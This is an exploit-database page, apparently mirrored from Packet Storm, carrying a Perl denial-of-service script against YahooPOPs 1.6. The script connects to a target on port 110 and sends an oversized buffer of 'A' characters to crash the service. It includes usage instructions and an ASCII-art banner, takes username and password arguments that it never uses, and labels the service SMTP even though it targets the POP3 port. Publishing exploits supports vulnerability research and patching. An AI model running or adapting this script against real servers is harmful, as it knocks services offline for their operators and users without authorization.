Lucene search
K

YahooPOPs 1.6 Denial Of Service

🗓️ 26 Jan 2024 00:00:00Reported by Fernando MengaliType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 322 Views

YahooPOPs 1.6 SMTP Denial Of Service by Fernando Mengal

Code
`use IO::Socket;  
  
sub intro {  
print q {  
  
,--,  
_ ___/ /\|  
,;'( )__, ) ~  
// // '--;   
' \ | ^  
^ ^  
  
[+] YahooPOPs 1.6 - SMTP - Denial of Service (DoS)  
  
[*] Coded by Fernando Mengali  
  
[@] e-mail: [email protected]  
  
}  
}  
  
intro();  
  
  
if (!$ARGV[0]) {  
print "\nUsage: $0 <ip> <username> <password>\n";  
exit(0);  
}  
  
my $host = $ARGV[0];  
my $username = $ARGV[1];  
my $password = $ARGV[2];  
my $port = 110;  
my $payload = "A" x 500;  
  
my $ip = inet_aton($ARGV[0]);  
  
my $socket = IO::Socket::INET->new(  
PeerAddr => $ip,  
PeerPort => $port,  
Proto => 'tcp',  
Timeout => 10  
);  
  
unless ($socket) {  
die "[+] socket() error: $!\n";  
}  
  
print "[+] YahooPOPS SMTP detected, constructing the payload\n";  
  
unless ($socket->send($payload)) {  
die "[+] Sending error, the server probably rebooted.\n";  
}  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation